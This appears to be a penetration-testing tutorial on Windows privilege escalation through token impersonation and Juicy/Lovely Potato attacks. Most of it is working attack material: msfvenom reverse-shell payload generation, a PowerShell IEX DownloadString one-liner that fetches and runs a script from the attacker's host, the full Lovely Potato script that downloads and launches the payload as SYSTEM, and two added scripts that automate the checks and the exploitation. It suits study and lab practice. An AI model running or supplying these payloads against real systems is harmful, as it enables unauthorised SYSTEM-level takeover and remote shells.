Token Impersonation and Potato Attacks

What are Tokens?

Tokens are temporary keys that describe the security context of a process or thread (the user, their groups and their privileges), so that Windows does not have to re-check credentials every time you access a file or a network resource. Think cookies for computers.

Incognito (the Meterpreter extension used below) sorts the tokens it finds into two types:

  • Delegate

    • Created by interactive logons, such as logging into the machine at the console or over Remote Desktop

    • Common, and usable to authenticate to remote hosts as that user

  • Impersonate

    • Created by "non-interactive" logons such as attaching a network drive or running a domain logon script

    • Less common, and only usable to act as that user on the local machine

Enumeration

Check user privilege:

whoami /priv

If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege appears in the output, the account is a candidate for token impersonation and a Potato attack. The State column matters less than it looks: Disabled means the token holds the privilege but has not switched it on, and a process can enable it itself; only a privilege that is absent from the list is truly unavailable. Two caveats: the incognito route below also needs a SYSTEM token to exist on the machine, and the original Juicy Potato technique stopped working in Windows 10 1809 / Server 2019 (build 17763), where a successor such as PrintSpoofer or RoguePotato is needed instead. For example:

  • Service accounts (LOCAL SERVICE, NETWORK SERVICE, IIS application pool and MSSQL service accounts) usually hold SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege, which is why web application and database footholds are the usual starting point.

  • Ordinary user accounts usually do not hold SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege at all.
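Before downloading anything to the target it is worth running the two checks above in one go. The following PowerShell is an added example, not code from the original notes or from the Lovely-Potato repo: it parses whoami /priv, reports whether each of the two privileges is held (treating Disabled as held), reads the OS build number from the registry and says whether the host is a candidate for the original Juicy Potato. The function name, the assumption that whoami prints an English State column, and the build threshold of 17763 are the example's own.

```powershell
# Added example (not from the original notes or the Lovely-Potato repo): a
# pre-flight check that reads whoami /priv and the OS build number and says
# whether this foothold is worth a Juicy Potato attempt.
function Test-PotatoPrerequisites {
    # Either privilege is enough for Juicy Potato to turn the stolen SYSTEM
    # token into a new process.
    $wanted = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'

    # whoami /priv prints one privilege per line: name, description, state.
    # The regex assumes an English-locale State column (Enabled/Disabled).
    $held = @{}
    foreach ($line in (whoami /priv)) {
        if ($line.Trim() -match '^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)$') {
            $held[$Matches[1]] = $Matches[2]
        }
    }

    $report = [ordered]@{}
    foreach ($priv in $wanted) {
        # "Disabled" still means the token holds the privilege; the process can
        # enable it itself. Only a missing line means it is not held at all.
        $report[$priv] = if ($held.ContainsKey($priv)) { $held[$priv] } else { 'not held' }
    }

    # Build 17763 (Windows 10 1809 / Server 2019) closed the DCOM trick the
    # original Juicy Potato relies on; newer builds need PrintSpoofer/RoguePotato.
    # The registry value is used instead of [Environment]::OSVersion because the
    # latter can report an older version from an unmanifested host process.
    $build = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber
    $hasPriv = @($wanted | Where-Object { $held.ContainsKey($_) }).Count -gt 0

    $report['OSBuild'] = $build
    $report['ImpersonationPossible'] = $hasPriv                       # any Potato / PrintSpoofer family
    $report['JuicyPotatoCandidate'] = $hasPriv -and ($build -lt 17763)  # the original Juicy Potato only
    [pscustomobject]$report
}

Test-PotatoPrerequisites | Format-List
```

Run it from the low-privileged shell you already have on the target; a result of ImpersonationPossible = True with JuicyPotatoCandidate = False tells you to skip Lovely Potato and reach for a newer Potato instead.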

Token Impersonation (Meterpreter)

If we get a Meterpreter session, the incognito extension lists the tokens available on the box and lets us impersonate one. The Meterpreter console treats a single backslash as an escape character, so the SYSTEM token name needs a doubled backslash; getuid confirms the switch before we drop to a shell:

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
meterpreter > getuid
meterpreter > shell

Cheat Code: Potato Attacks

Many Windows machines, in particular service-account footholds on builds before 17763, are vulnerable to Potato attacks, so I call this attack the "cheat code" in Windows privilege escalation.

For potato attacks, I recommend Lovely Potato, an automated wrapper around Juicy Potato: it enumerates CLSIDs, tests which of them hand back a SYSTEM token, and runs Juicy Potato against those. The GitHub repo of Lovely Potato is cloned in the setup below:

Setup:

cd /usr/share/windows-resources
git clone https://github.com/TsukiCTF/Lovely-Potato.git
cd Lovely-Potato

Open Invoke-LovelyPotato.ps1 in a text editor and modify these two variables: the URL of the web server you will run on Kali (add the port if it is not 80) and a directory on the victim that the current user can write to (the script's default, C:\Windows\System32\spool\drivers\color, is writable by authenticated users on a stock install):

$RemoteDir = "http://<kali_ip>"
$LocalPath = "<writable_path_on_victim_machine>"

In the directory /usr/share/windows-resources/Lovely-Potato/, create a msfvenom reverse shell payload. Keep the file name meterpreter.exe even though windows/shell_reverse_tcp is a plain (stageless) command shell rather than Meterpreter: that is the name the script downloads, and stageless means a bare netcat listener is enough on the Kali side:

msfvenom -p windows/shell_reverse_tcp LHOST=<kali_ip> LPORT=<choose_a_port> -f exe -o meterpreter.exe

Start a web server on port 80, so that the port-less $RemoteDir above resolves (updog listens on 9090 by default, so give it the port explicitly, or put the port into $RemoteDir instead):

sudo updog -p 80

Start a listener on the port you chose for the payload. rev is not a stock listener command (on Kali it is the util-linux line-reversing utility), so use your own listener alias or plain netcat:

nc -nvlp <the_port_you_chose>

On the Windows client, start a PowerShell and run Invoke-LovelyPotato.ps1 remotely via the DownloadString method:

powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://<kali_ip>/Invoke-LovelyPotato.ps1')"

The script sleeps for 600 seconds while test_clsid.bat probes every CLSID, so allow about 10 minutes; the reverse shell that then connects back runs as NT AUTHORITY\SYSTEM.

For completeness, here is the content of the PowerShell script:

# Configuration: web server on Kali (no port means 80) and a directory the
# current user can write to (the spool colour directory is writable by
# authenticated users on a stock install)
$RemoteDir = "http://<kali_ip>"
$LocalPath = "c:\windows\system32\spool\drivers\color"

# Download necessary files for exploitation
(New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe")

# Enumerate CLSIDs: every CLSID that has an AppID, written one per line to CLSID.list
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
$CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null}
$CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii
# test_clsid.bat tries each CLSID and appends lines of the form CLSID;account to
# result.log; Start-Process does not wait for it, which is why the sleep below exists
Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath

# Find System CLSIDs: give the tester 10 minutes, then keep the CLSID column of every SYSTEM line
Start-Sleep -s 600
$SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]}

# Launch Juicy Potato once per SYSTEM CLSID (-t * tries both CreateProcessWithTokenW
# and CreateProcessAsUser, -l is the local port its COM server listens on);
# expect one callback on the listener per CLSID
$SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"}

We can do this manually as well. On Kali, make sure your current working directory has the following files:

  • JuicyPotato-Static.exe

  • test_clsid.bat

  • meterpreter.exe

Now start an HTTP server on this directory. On Windows, set the same two variables as in the script, then transfer the three files:

$RemoteDir = "http://<kali_ip>"
$LocalPath = "<writable_path_on_victim_machine>"
(New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat")
(New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe")

Enumerate CLSIDs:

New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
$CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null}
$CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii
Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath

Find system CLSIDs. test_clsid.bat runs in the background and takes several minutes to work through the list, so wait for it (the script uses a fixed 600-second sleep) and then keep the CLSID column of every result.log line that mentions SYSTEM:

Start-Sleep -s 600
$SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]}

Launch Juicy Potato once per SYSTEM CLSID:

$SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"}

A SYSTEM reverse shell should now connect back to the listener on Kali; since the loop fires the payload once per SYSTEM CLSID, more than one connection may arrive.
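Both the script and the manual steps above sleep a fixed 600 seconds and then fire the payload for every SYSTEM CLSID. The following PowerShell is an added example, not Lovely-Potato's own code: it waits for test_clsid.bat to actually exit, parses result.log into CLSID/account pairs, de-duplicates the SYSTEM ones and stops after the first launch that Juicy Potato reports as successful. It assumes the three files already sit in $LocalPath under the names the page uses, that result.log contains CLSID;account lines (the format the findstr/split step above relies on), and that a successful launch prints a line containing "CreateProcessWithTokenW OK" or "CreateProcessAsUser OK" (Juicy Potato's console banner as I know it; treat that match as an assumption and drop the break if your build prints something else).

```powershell
# Added example (not Lovely-Potato's own code): same three files, but wait for the
# CLSID tester to finish instead of sleeping, then launch once per SYSTEM CLSID.
param(
    [string]$LocalPath  = 'C:\Windows\System32\spool\drivers\color',  # assumed writable
    [int]   $ComPort    = 10001,   # local port Juicy Potato's COM server listens on (-l)
    [int]   $TimeoutSec = 900      # upper bound for test_clsid.bat before we use partial results
)

# 1. Enumerate every CLSID that has an AppID (same selection as the page's script).
if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
}
Get-ItemProperty HKCR:\CLSID\* -ErrorAction SilentlyContinue |
    Where-Object { $_.AppID } |
    ForEach-Object { $_.PSChildName } |
    Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii

# 2. Run the tester and block on its exit rather than on a fixed sleep.
Remove-Item "$LocalPath\result.log" -ErrorAction SilentlyContinue
$tester = Start-Process -FilePath cmd.exe -ArgumentList "/c $LocalPath\test_clsid.bat" `
    -WorkingDirectory $LocalPath -WindowStyle Hidden -PassThru
if (-not $tester.WaitForExit($TimeoutSec * 1000)) {
    Write-Warning "test_clsid.bat still running after $TimeoutSec s; using partial result.log"
}

# 3. Parse result.log: assumed format is one "CLSID;account" line per CLSID that
#    returned a token. Keep only SYSTEM hits, de-duplicated.
$systemClsids = Get-Content "$LocalPath\result.log" -ErrorAction Stop |
    Where-Object { $_ -match ';' } |
    ForEach-Object {
        $clsid, $account = $_.Split(';', 2)
        [pscustomobject]@{ CLSID = $clsid.Trim(); Account = $account.Trim() }
    } |
    Where-Object { $_.Account -match 'SYSTEM' } |
    Select-Object -ExpandProperty CLSID -Unique

if (-not $systemClsids) { throw 'No CLSID yielded a SYSTEM token on this host' }
Write-Host "SYSTEM CLSIDs: $($systemClsids -join ', ')"

# 4. Fire the payload once per CLSID; -t * tries both CreateProcessWithTokenW and
#    CreateProcessAsUser. Stop at the first launch Juicy Potato reports as OK
#    (success banner assumed; remove the break if your binary prints differently).
foreach ($clsid in $systemClsids) {
    $out = & "$LocalPath\juicypotato.exe" -t '*' -p "$LocalPath\meterpreter.exe" -l $ComPort -c $clsid 2>&1
    Write-Host "[$clsid] $($out -join ' ')"
    if ($out -match 'CreateProcess\w+ OK') { break }
    Start-Sleep -Seconds 2
}
```

Save it next to the downloaded files and run it from the low-privileged PowerShell on the target (for example `.\Run-Potato.ps1 -LocalPath C:\some\other\writable\dir`); stopping after the first successful launch keeps you from collecting one SYSTEM shell per CLSID on the listener.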
